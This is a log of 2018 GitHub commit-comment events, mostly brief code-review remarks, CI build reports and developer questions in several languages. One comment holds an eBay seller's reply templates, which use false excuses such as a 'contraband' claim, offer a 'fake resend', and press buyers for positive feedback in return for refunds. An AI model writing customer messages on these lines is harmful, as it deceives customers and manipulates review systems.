{"id":"7961026226","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29697058,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-13T09:20:43Z","updated_at":"2018-07-13T09:20:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T09:20:43Z"}
{"id":"7961026489","type":"CommitCommentEvent","actor":{"login":"Hyejeong97"},"repo":{"name":"minomi/Min-Learning"},"payload":{"comment":{"id":29697059,"position":null,"line":null,"path":null,"commit_id":"054688f2d8a60d9d43183c777be86e9ec89067a9","created_at":"2018-07-13T09:20:46Z","updated_at":"2018-07-13T09:20:46Z","author_association":"NONE","body":"잘 봤습니다 :) ,,  Python 기초편도 올려주시는게 어떠신지요?"}},"created_at":"2018-07-13T09:20:46Z"}
{"id":"7961026709","type":"CommitCommentEvent","actor":{"login":"Juslonluo"},"repo":{"name":"bigsinger/AndroidIdChanger"},"payload":{"comment":{"id":29697061,"position":null,"line":null,"path":null,"commit_id":"aa993d8ba58863e1d922efcd609943a462626bf2","created_at":"2018-07-13T09:20:49Z","updated_at":"2018-07-13T09:20:49Z","author_association":"NONE","body":"谢谢作者的回复。\r\n\r\nICCID：Integrate circuit card identity 集成电路卡识别码（固化在手机SIM卡中），简单来说就是SIM卡序列号，它拥有独一无二的特性，类似于手机的序列号，仅仅指向一张手机卡。共有20位数字组成，不同运营商编码格式不一样。并且前六位数字为运营商代码：比如中国移动的为：898600；中国联通的为：898601，中国电信的为：898603。"}},"created_at":"2018-07-13T09:20:49Z"}
{"id":"7961029418","type":"CommitCommentEvent","actor":{"login":"Ceridan"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29697077,"position":14,"line":14,"path":"Dodo.Tests/DSL/BoardsControllerBuilder.cs","commit_id":"803c138b8983b9fcdfa0e6bf9dfea3b5cfd26ca2","created_at":"2018-07-13T09:21:20Z","updated_at":"2018-07-13T09:21:20Z","author_association":"NONE","body":"Вот тут не понимаю. Dummy objects are passed around but never actually used. Usually they are just used to fill parameter lists. Я создаю этот объект только для того, чтобы просунуть как параметр в конструктор, больше он меня не интересует вообще. Почему это стаб?"}},"created_at":"2018-07-13T09:21:20Z"}
{"id":"7961030546","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29697080,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-13T09:21:33Z","updated_at":"2018-07-13T09:21:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T09:21:33Z"}
{"id":"7961031918","type":"CommitCommentEvent","actor":{"login":"JIAOJIAOS"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29697083,"position":null,"line":null,"path":null,"commit_id":"2da984bbff805a1647c467453b766a8c58939aa9","created_at":"2018-07-13T09:21:49Z","updated_at":"2018-07-13T09:21:49Z","author_association":"NONE","body":"var json = {\r\n\tdata:[\r\n\t\t{\r\n\t\t\ttitle:\"取消长时间未发货EUB\",value:\"Dear friend, postoffice said the item you buy is contraband, won't send to your address, so not send yet, and ebay will inspected about send parcel handle time, and in official transport in ePack or not, could you kindly cancel this order for us, cause you a load of problem, so sorry. I know it sounds ridiculous, but contraband to office could be anything, I recently got a wallpaper return because it's a worldwide map pattern wallpaper.\"\r\n\t\t},\r\n\t        {\r\n\t\t\ttitle:'其他国家10-30天来未收到',value:`Not that fast from China to your country, please wait patient, normally it will take 3-5 weeks for the item to get into your local post, would you mind to give it more time? Is that acceptable? Please don't worry that, we are here for you if you have other problems.\r\n`},\r\n                {\r\n\t\t\ttitle:'超过35 days',value:`We checked transaction information, your package is already in your country, please check, tracking number is already upload on eBay. Normally it will take 3-5 weeks for the item to get into your local post office, it could delayed a little more on transport, really normal, would you mind wait more time? Maybe you can go post office to check. If it not received in 60 days in the end (which a few people's delayed time), over that, could be lost, will refund you ASAP, hope you could understand, thanks very much. Have a nice day!\r\n`},\r\n                {\r\n\t\t\ttitle:'退包',value:`It seems like your parcel returned by your local post office, do not worry, we will refund you after we received the package, you can also check by yourself, hope you are not leave bad review so earily, the tracking number is \r\n`},\r\n                {\r\n\t\t\ttitle:'退款',value:`Refund you now. If did not receive in 24 hours, please contact us again, lately have some problem with our finance department. Hope you can leave a positive feedback, sorry about this situation.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'图片',value:`Please send product picture for us to check, and picture of shipping label on package, a codebar tip on product wrapper would be even better. Thank you.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'作废订单来找',value:`Sorry for this situation, I can refund you first, since it could lost after this long time, could you leave me a positive feedback, then wait for this product?\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'退半款',value:`Would you kindly accept half refund as apology, sorry about this situation.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'退全款',value:`Would you kindly accept full refund as apology, sorry about this situation. hope you are not leaving any negative feedback.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'少发',value:`I'm sorry about this, it must be forgotten when packing, our warehouse worker have lots of package need to prepare everyday, hope you will believe and understand, would you kindly accept refund of this missing product? Could you please not leaving bad review?\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'错发',value:`I'm sorry about this, it must be wrong-packed when packing, our warehouse worker have lots of package need to prepare everyday, hope you will believe and understand, would you kindly accept refund of this wrong sent product? Could you please not leaving bad review?\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'回给冷静的买家',value:`Thank you for understanding, hope you can get your item soon! have a nice day.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'假重发',value:`Sorry about this situation, how about resend you a new product? you can reject one parcel after you receive either one of them, is this acceptable?\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'同意假重发',value:`Thank you for understanding, we will arrange it in 12 hours, hope you can get your item soon. have a nice day.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'一般的回复',value:`thanks for your long time support. have a nice day.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'为什么取消我的订单',value:`oh, that one, is in paid pending status, means you paid, but paypal didn't give it to me, sometimes it happen, because paypal, ebay and my system not connect very well, if you still want it, you can buy again, I believe you already got refund from paypal. sorry about this situation, shit happens.\r\n`},\r\n\t\t{\r\n\t\t\ttitle:'买家收到物品 并且很满意，让买家确认物品已准时送达',value:`Dear friend,I’m so glad to hear that. Thank you very much for your kind message, we are happy to know that you have received your item. If you like our item or if you are satisfied with our service, hope you can leave us a positive feedback with all five star, meanwhile, you can confirm the item was delivered on time(connect to on-time delivery question, please say YES), that is very important to our business success. Thank you. Looking forward to next cooperation. Best wishes.\r\n`}\r\n\t     ]\r\n           };"}},"created_at":"2018-07-13T09:21:49Z"}
{"id":"7961034306","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29697091,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-13T09:22:18Z","updated_at":"2018-07-13T09:22:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T09:22:18Z"}
{"id":"7961034912","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"der-schmelle2/dbcookbook"},"payload":{"comment":{"id":29697093,"position":5,"line":100,"path":"en/xml/fo/topic.graphic-pageheader.xml","commit_id":"4b4d7c8a8f07b2f36d966d482ed135ba4a874ef9","created_at":"2018-07-13T09:22:26Z","updated_at":"2018-07-13T09:22:26Z","author_association":"NONE","body":"The `>` was correct. You've introduced another syntax error. :wink: "}},"created_at":"2018-07-13T09:22:26Z"}
{"id":"7961035317","type":"CommitCommentEvent","actor":{"login":"DawnYang-cn"},"repo":{"name":"DawnYang-cn/summarize"},"payload":{"comment":{"id":29697095,"position":null,"line":null,"path":null,"commit_id":"2193dfc7b01225bdb6f6c50e7a8e884f1dd62ea7","created_at":"2018-07-13T09:22:31Z","updated_at":"2018-07-13T09:22:31Z","author_association":"OWNER","body":"find some function without return check"}},"created_at":"2018-07-13T09:22:31Z"}
{"id":"7961038103","type":"CommitCommentEvent","actor":{"login":"medeiva"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29697103,"position":6,"line":6,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T09:23:04Z","updated_at":"2018-07-13T09:23:04Z","author_association":"OWNER","body":"я вот этот момент не понимаю, как именно тогда это должно выглядеть. как должны выглядеть методы и где я тогда присваиваю значения7 понятно что в инициализации, но как тогда?  attr_writer сделать ? а как тогад присваивание?"}},"created_at":"2018-07-13T09:23:04Z"}
{"id":"7961073036","type":"CommitCommentEvent","actor":{"login":"anatoly-os"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29697208,"position":23,"line":65,"path":"mscore/startcenter.cpp","commit_id":"0dbfa11f3b1c0e67b27b457238a25ad731d60149","created_at":"2018-07-13T09:29:55Z","updated_at":"2018-07-13T09:29:55Z","author_association":"CONTRIBUTOR","body":"Right now reimplementing with qwebview again as it has been done in 2.3. this commit is to sync handrok's work with mine."}},"created_at":"2018-07-13T09:29:55Z"}
{"id":"7961074137","type":"CommitCommentEvent","actor":{"login":"mchoma"},"repo":{"name":"fjuma/wildfly-elytron"},"payload":{"comment":{"id":29697213,"position":75,"line":75,"path":"src/test/java/org/wildfly/security/x500/cert/acme/AcmeClientSpiTest.java","commit_id":"d221cec97a20c20f9a259594789e133091bb6667","created_at":"2018-07-13T09:30:09Z","updated_at":"2018-07-13T09:30:09Z","author_association":"NONE","body":"Running tests locally it takes 2 minutes. Is it somehow expected?"}},"created_at":"2018-07-13T09:30:09Z"}
{"id":"7961075592","type":"CommitCommentEvent","actor":{"login":"abelectronicsuk"},"repo":{"name":"abelectronicsuk/ABElectronics_Python_Libraries"},"payload":{"comment":{"id":29697220,"position":null,"line":null,"path":null,"commit_id":"e562704aa41c9d1057871db3f8a978f8d46aa116","created_at":"2018-07-13T09:30:24Z","updated_at":"2018-07-13T09:30:24Z","author_association":"OWNER","body":"I have updated the ADCDifferentialPi code to match the ADCPi code.  Thank you for noticing the problem.\r\n\r\nFor the time being we are going to keep the two libraries separate as it makes it easier for our customers who are new to python to pick the correct library for their ADC board."}},"created_at":"2018-07-13T09:30:24Z"}
{"id":"7961085835","type":"CommitCommentEvent","actor":{"login":"medeiva"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29697241,"position":4,"line":4,"path":"lesson4/cargoTrain.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T09:32:27Z","updated_at":"2018-07-13T09:32:27Z","author_association":"OWNER","body":"но в суперклассе по логике вообще типа не должны быть, а где его тогда присваивать? \r\nпочему не в инициализации подкласса?"}},"created_at":"2018-07-13T09:32:27Z"}
{"id":"7961090396","type":"CommitCommentEvent","actor":{"login":"mchoma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29697257,"position":56,"line":89,"path":"elytron/src/test/java/org/wildfly/extension/elytron/KeyStoresTestCase.java","commit_id":"080336cffe73c28ac4d69dc81ae9d613d8904132","created_at":"2018-07-13T09:33:21Z","updated_at":"2018-07-13T09:33:21Z","author_association":"NONE","body":"It takes over one minute locally. Is it expected?"}},"created_at":"2018-07-13T09:33:21Z"}
{"id":"7961098733","type":"CommitCommentEvent","actor":{"login":"artemp"},"repo":{"name":"mapbox/variant"},"payload":{"comment":{"id":29697277,"position":23,"line":40,"path":"include/mapbox/variant.hpp","commit_id":"372d7c88fe796a138d0e578328914ac80e5a949a","created_at":"2018-07-13T09:34:58Z","updated_at":"2018-07-13T09:34:58Z","author_association":"MEMBER","body":"@jfirebaugh - hmm, I'm struggling to remember exact details. It could've been some weird compiler combo..or more likely I pushed my local changes by mistake. Feel free to add them back if it makes sense. "}},"created_at":"2018-07-13T09:34:58Z"}
{"id":"7961098969","type":"CommitCommentEvent","actor":{"login":"conor-cafferkey-sociomantic"},"repo":{"name":"conor-cafferkey-sociomantic/enzyme"},"payload":{"comment":{"id":29697279,"position":null,"line":null,"path":null,"commit_id":"670a88cb7bf539008258f78937e36174805083cb","created_at":"2018-07-13T09:35:00Z","updated_at":"2018-07-13T09:35:00Z","author_association":"OWNER","body":"Thanks for the reminder!  PR’d here: https://github.com/airbnb/enzyme/pull/1714"}},"created_at":"2018-07-13T09:35:00Z"}
{"id":"7961103366","type":"CommitCommentEvent","actor":{"login":"Eiyeron"},"repo":{"name":"Yanrishatum/haxe-format-tiled"},"payload":{"comment":{"id":29697288,"position":null,"line":null,"path":null,"commit_id":"3f1ae235a12943cee96a9e2e0828962a477c2896","created_at":"2018-07-13T09:35:54Z","updated_at":"2018-07-13T09:35:54Z","author_association":"NONE","body":"Ah, just a heads-up, the tileset has a CC-BY licence as seen [here](https://opengameart.org/content/outdoor-tiles-again). I forgot to bundle a mention in the sample test I made yesterday, my bad."}},"created_at":"2018-07-13T09:35:54Z"}
{"id":"7961105080","type":"CommitCommentEvent","actor":{"login":"zcshi"},"repo":{"name":"alibaba/dubbo-spring-boot-starter"},"payload":{"comment":{"id":29697293,"position":null,"line":null,"path":null,"commit_id":"6f19257ce4647726318be96e56c89b059078783a","created_at":"2018-07-13T09:36:16Z","updated_at":"2018-07-13T09:36:16Z","author_association":"NONE","body":"未32"}},"created_at":"2018-07-13T09:36:16Z"}
{"id":"7961106184","type":"CommitCommentEvent","actor":{"login":"accuminium"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29697296,"position":54,"line":93,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T09:36:29Z","updated_at":"2018-07-13T09:36:29Z","author_association":"MEMBER","body":">  (...) I am currently trying to give some feedback (**Florian is also contributing**) to that.\r\n\r\nI guess that's why Florian asked for our feedback/review of this and appreciate the opportunity.\r\n\r\n>  Things such as these (also prefix/suffix, camel not camel, 2/4 space indent) which do not have tangible technical implications but boil down to more or less personal preferences will most probably end up the way how Google currently prefers to have it.\r\n\r\nLike you, I do not want to waste our time bike-shedding. As long as the established guidelines are based on principles instead of precedence (or gut-feeeling preference), I am fine with them. I tried to focus my feedback on spots where the principle is not clear to me, asking for rationale or change. I suggest we do the same for \"upstream\" feedback."}},"created_at":"2018-07-13T09:36:29Z"}
{"id":"7961107747","type":"CommitCommentEvent","actor":{"login":"zcshi"},"repo":{"name":"alibaba/dubbo-spring-boot-starter"},"payload":{"comment":{"id":29697302,"position":null,"line":null,"path":null,"commit_id":"6f19257ce4647726318be96e56c89b059078783a","created_at":"2018-07-13T09:36:47Z","updated_at":"2018-07-13T09:36:47Z","author_association":"NONE","body":"我直接使用pom下载的2.0版本，还是没有提示。"}},"created_at":"2018-07-13T09:36:47Z"}
{"id":"7961112987","type":"CommitCommentEvent","actor":{"login":"ningyuansg"},"repo":{"name":"source-academy/cadet-frontend"},"payload":{"comment":{"id":29697311,"position":9,"line":37,"path":"src/reducers/states.ts","commit_id":"80482b4d96675250109da7a06e2a95b07c19d6a3","created_at":"2018-07-13T09:37:48Z","updated_at":"2018-07-13T09:37:48Z","author_association":"MEMBER","body":"@remo5000 Sorry, just noticed this. Can this be property be named workspace?"}},"created_at":"2018-07-13T09:37:48Z"}
{"id":"7961110296","type":"CommitCommentEvent","actor":{"login":"nurpax"},"repo":{"name":"IreneKnapp/direct-sqlite"},"payload":{"comment":{"id":29697306,"position":null,"line":null,"path":null,"commit_id":"e28b0c71f482be7c4d88e967e6a644b25b30bef0","created_at":"2018-07-13T09:37:18Z","updated_at":"2018-07-13T09:37:18Z","author_association":"COLLABORATOR","body":"Technically this breaks backwards compatibility in the Bindings module (int to bool) but otoh bumping the major version probably causes more churn than fixing an odd use of this probably rately used function. So i think we’ll go with the version bump you did. "}},"created_at":"2018-07-13T09:37:18Z"}
{"id":"7961118929","type":"CommitCommentEvent","actor":{"login":"yamahdico"},"repo":{"name":"yamahdico/Web-Optimizer"},"payload":{"comment":{"id":29697322,"position":null,"line":null,"path":null,"commit_id":"5bcac8dfbd8e66ab4ddc3ff4dfe2460f2d645ad7","created_at":"2018-07-13T09:38:59Z","updated_at":"2018-07-13T09:38:59Z","author_association":"OWNER","body":"A function for save in storage\r\n\r\n```\r\n+function cancel2() {\r\n+chrome.storage.local.get(\"active\", items=>{\r\n+\tconsole.log(items.active);\r\n+\tactive = items.active;\r\n+\t\r\n+\tif(items.active){\r\n+\tbrowser.storage.local.set({active:false});\r\n+\t  browser.browserAction.setIcon({path: \"Tele2.ico\"});\r\n+\t}else{\r\n+\tbrowser.storage.local.set({active:true});\r\n+\tbrowser.browserAction.setIcon({path: \"Not_optimum.png\"});\r\n+\t}\r\n+\t});\r\n+}\r\n```\r\nMay used var \"active\" for checking value"}},"created_at":"2018-07-13T09:38:59Z"}
{"id":"7961118960","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29697323,"position":null,"line":null,"path":null,"commit_id":"834113607dbd241332ce36f674d9b9af61b0c3ba","created_at":"2018-07-13T09:39:00Z","updated_at":"2018-07-13T09:39:00Z","author_association":"OWNER","body":"@nfeske: please consider for sculpt"}},"created_at":"2018-07-13T09:39:00Z"}
{"id":"7961120388","type":"CommitCommentEvent","actor":{"login":"qwertbob"},"repo":{"name":"qwertbob/P64xDataModel"},"payload":{"comment":{"id":29697326,"position":null,"line":null,"path":null,"commit_id":"b53238f2a3eb2a3f58da07b46f3c80ec5e03437a","created_at":"2018-07-13T09:39:17Z","updated_at":"2018-07-13T09:39:17Z","author_association":"OWNER","body":"FD column finished"}},"created_at":"2018-07-13T09:39:17Z"}
{"id":"7961125539","type":"CommitCommentEvent","actor":{"login":"PubMatic-OpenWrap"},"repo":{"name":"PubMatic/OpenWrap"},"payload":{"comment":{"id":29697334,"position":44,"line":91,"path":"init-build.sh","commit_id":"f921913d671d05f75f8985b84c4afd82fcae279e","created_at":"2018-07-13T09:40:19Z","updated_at":"2018-07-13T09:40:19Z","author_association":"NONE","body":"codeType is modified to task"}},"created_at":"2018-07-13T09:40:19Z"}
{"id":"7961127165","type":"CommitCommentEvent","actor":{"login":"yego76"},"repo":{"name":"uber/NullAway"},"payload":{"comment":{"id":29697336,"position":null,"line":null,"path":null,"commit_id":"da29c0ffed7b48e571b6c3f116aa0f3dbe268a25","created_at":"2018-07-13T09:40:38Z","updated_at":"2018-07-13T09:40:38Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-13T09:40:38Z"}
{"id":"7961129528","type":"CommitCommentEvent","actor":{"login":"a54678861"},"repo":{"name":"a54678861/sampletest"},"payload":{"comment":{"id":29697339,"position":1,"line":1,"path":"sample.txt","commit_id":"f5e5d62df9fadf550ba9119b62e54fc6b0d80dc4","created_at":"2018-07-13T09:41:07Z","updated_at":"2018-07-13T09:41:07Z","author_association":"OWNER","body":"waht?\r\n"}},"created_at":"2018-07-13T09:41:07Z"}
{"id":"7961141459","type":"CommitCommentEvent","actor":{"login":"returnfunction163"},"repo":{"name":"shengzx/--lantern--vpn"},"payload":{"comment":{"id":29697364,"position":null,"line":null,"path":null,"commit_id":"0cb5f1a1d47b5da6027fbef309443d5a896a773e","created_at":"2018-07-13T09:43:28Z","updated_at":"2018-07-13T09:43:28Z","author_association":"NONE","body":"发V"}},"created_at":"2018-07-13T09:43:28Z"}
{"id":"7961156987","type":"CommitCommentEvent","actor":{"login":"Im-cbird"},"repo":{"name":"Im-cbird/github-test"},"payload":{"comment":{"id":29697414,"position":3,"line":1,"path":"second.txt","commit_id":"f6945fef3c7fa51fff0f7f569dffbb60954835fe","created_at":"2018-07-13T09:46:31Z","updated_at":"2018-07-13T09:46:31Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-13T09:46:31Z"}
{"id":"7961157649","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29697416,"position":null,"line":null,"path":null,"commit_id":"5dbafb760e08f6040d4ce3c3ed4ace310a366b6d","created_at":"2018-07-13T09:46:39Z","updated_at":"2018-07-13T09:46:39Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-13T09:46:39Z"}
{"id":"7961157774","type":"CommitCommentEvent","actor":{"login":"Hibin"},"repo":{"name":"Hibin/hs-test"},"payload":{"comment":{"id":29697417,"position":null,"line":null,"path":null,"commit_id":"78272e5f8dbe90354df8abc8f34a6333ba06bff2","created_at":"2018-07-13T09:46:41Z","updated_at":"2018-07-13T09:46:41Z","author_association":"OWNER","body":"#5 "}},"created_at":"2018-07-13T09:46:41Z"}
{"id":"7961164512","type":"CommitCommentEvent","actor":{"login":"zcshi"},"repo":{"name":"alibaba/dubbo-spring-boot-starter"},"payload":{"comment":{"id":29697435,"position":134,"line":134,"path":"src/main/java/com/alibaba/dubbo/spring/boot/DubboCommonAutoConfiguration.java","commit_id":"ab0ad88440fb45c823bc1c4359248b66d77ebcec","created_at":"2018-07-13T09:47:58Z","updated_at":"2018-07-13T09:47:58Z","author_association":"NONE","body":"???"}},"created_at":"2018-07-13T09:47:58Z"}
{"id":"7961164664","type":"CommitCommentEvent","actor":{"login":"shishiteng"},"repo":{"name":"HKUST-Aerial-Robotics/VINS-Mono"},"payload":{"comment":{"id":29697436,"position":null,"line":null,"path":null,"commit_id":"9ff5dfc200852b12df75fa120e9559b0aabdbd03","created_at":"2018-07-13T09:48:00Z","updated_at":"2018-07-13T09:48:00Z","author_association":"NONE","body":"Hi,is there any improvement after fixing this bug?\r\nI  tested euroc and myown datasets,both of the old version and new version worked very well. I can hardly see any diffrence between them."}},"created_at":"2018-07-13T09:48:00Z"}
{"id":"7961168876","type":"CommitCommentEvent","actor":{"login":"qwertbob"},"repo":{"name":"qwertbob/P64xDataModel"},"payload":{"comment":{"id":29697449,"position":null,"line":null,"path":null,"commit_id":"b53238f2a3eb2a3f58da07b46f3c80ec5e03437a","created_at":"2018-07-13T09:48:49Z","updated_at":"2018-07-13T09:48:49Z","author_association":"OWNER","body":"Now /P645/ /FD column/ /courier cell/ /data source/ in /data model/ is corresponding with /UDT/."}},"created_at":"2018-07-13T09:48:49Z"}
{"id":"7961178132","type":"CommitCommentEvent","actor":{"login":"tillt"},"repo":{"name":"orsenthil/dcos"},"payload":{"comment":{"id":29697468,"position":6,"line":3,"path":"packages/mesos/buildinfo.json","commit_id":"37b0064b9a66963d865e1ad393ab7c596710b913","created_at":"2018-07-13T09:50:39Z","updated_at":"2018-07-13T09:50:39Z","author_association":"NONE","body":"You have a couple of trailing whitespaces here - maybe we should kill those?"}},"created_at":"2018-07-13T09:50:39Z"}
{"id":"7961183733","type":"CommitCommentEvent","actor":{"login":"ExtraConcentratedJuice"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29697483,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-13T09:51:45Z","updated_at":"2018-07-13T09:51:45Z","author_association":"OWNER","body":"you look like you have an outdated version of the config, get the latest release \r\n\r\nhttps://github.com/ExtraConcentratedJuice/pokecord-catcher/releases"}},"created_at":"2018-07-13T09:51:45Z"}
{"id":"7961185669","type":"CommitCommentEvent","actor":{"login":"proogrammer"},"repo":{"name":"proogrammer/WinConsoleGameEngine"},"payload":{"comment":{"id":29697489,"position":4,"line":4,"path":"ConsoleTetris/ConsoleEngine/gameObject/gameobject.cpp","commit_id":"d90a92e0e1c99c7a4a43b876504043b57171f1eb","created_at":"2018-07-13T09:52:08Z","updated_at":"2018-07-13T09:52:08Z","author_association":"OWNER","body":"map객체는 gameobject에서 처리할 문제가 아님, gamemanager 클래스에서 addGameObject() 실행 시에 해당 객체에 넣어 주면됨"}},"created_at":"2018-07-13T09:52:08Z"}
{"id":"7961188927","type":"CommitCommentEvent","actor":{"login":"oomek"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29697497,"position":null,"line":null,"path":null,"commit_id":"2ce5d1e881609945928829d5b5888b764cc4ad08","created_at":"2018-07-13T09:52:44Z","updated_at":"2018-07-13T09:52:44Z","author_association":"CONTRIBUTOR","body":"I confirm, the patch does it's job."}},"created_at":"2018-07-13T09:52:44Z"}
{"id":"7961189588","type":"CommitCommentEvent","actor":{"login":"proogrammer"},"repo":{"name":"proogrammer/WinConsoleGameEngine"},"payload":{"comment":{"id":29697498,"position":18,"line":45,"path":"ConsoleTetris/ConsoleEngine/gamemanager/gamemanger.cpp","commit_id":"d90a92e0e1c99c7a4a43b876504043b57171f1eb","created_at":"2018-07-13T09:52:52Z","updated_at":"2018-07-13T09:52:52Z","author_association":"OWNER","body":"이와 같은 TODO 메세지들은 모조리 함수 위에 붙이거나 둘다 붙이기"}},"created_at":"2018-07-13T09:52:52Z"}
{"id":"7961192057","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29697503,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-13T09:53:20Z","updated_at":"2018-07-13T09:53:20Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-13T09:53:20Z"}
{"id":"7961193268","type":"CommitCommentEvent","actor":{"login":"duncanparker"},"repo":{"name":"duncanparker/tym"},"payload":{"comment":{"id":29697506,"position":75,"line":75,"path":"source/core/data.sql.d","commit_id":"fcf8fe0398eb4f19eebc99a69cc525de9758f4cd","created_at":"2018-07-13T09:53:35Z","updated_at":"2018-07-13T09:53:35Z","author_association":"OWNER","body":"Need to normalize spacing"}},"created_at":"2018-07-13T09:53:35Z"}
